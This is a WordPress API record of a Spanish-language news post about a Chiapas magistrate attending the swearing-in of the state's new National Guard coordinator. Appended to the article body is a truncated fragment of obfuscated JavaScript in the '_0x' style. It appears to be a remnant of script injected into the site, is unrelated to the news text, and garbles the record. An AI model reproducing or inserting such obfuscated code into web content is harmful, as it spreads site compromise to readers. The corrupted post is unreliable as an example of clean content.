{"id":21730,"date":"2025-05-03T06:20:42","date_gmt":"2025-05-03T06:20:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21730"},"modified":"2025-05-03T06:20:43","modified_gmt":"2025-05-03T06:20:43","slug":"asiste-juan-carlos-moreno-a-la-toma-de-protesta-del-nuevo-coordinador-estatal-de-la-guardia-nacional","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21730","title":{"rendered":"Asiste Juan Carlos Moreno a la toma de protesta del nuevo coordinador estatal de la Guardia Nacional"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004-1024x682.jpg\" alt=\"\" class=\"wp-image-21731\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250503-WA0004.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>2 de mayo del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar a la Ceremonia de Toma de Posesi\u00f3n del Cargo y Protesta de Bandera del comisario J. In\u00e9s Mel\u00e9ndez Estrada, quien asume la responsabilidad como coordinador estatal de la Guardia Nacional en Chiapas.<\/p>\n\n\n\n<p>Desde las instalaciones de la Coordinaci\u00f3n de la Guardia Nacional en el estado, el magistrado presidente Moreno Guill\u00e9n extern\u00f3 su confianza al comandante Mel\u00e9ndez Estrada, teniendo la certeza de que con su nueva encomienda se seguir\u00e1 fortaleciendo la seguridad y la tranquilidad de las y los chiapanecos.<\/p>\n\n\n\n<p>Asimismo, reiter\u00f3 el compromiso del Poder Judicial y la disposici\u00f3n para colaborar institucionalmente en favor de la paz y la justicia en Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 2 de mayo del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador Eduardo Ram\u00edrez Aguilar a la Ceremonia de Toma de Posesi\u00f3n del Cargo y Protesta de Bandera del comisario J. In\u00e9s Mel\u00e9ndez Estrada, quien asume la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21731,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21730","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21730","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21730"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21730\/revisions"}],"predecessor-version":[{"id":21732,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21730\/revisions\/21732"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21731"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21730"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21730"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21730"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}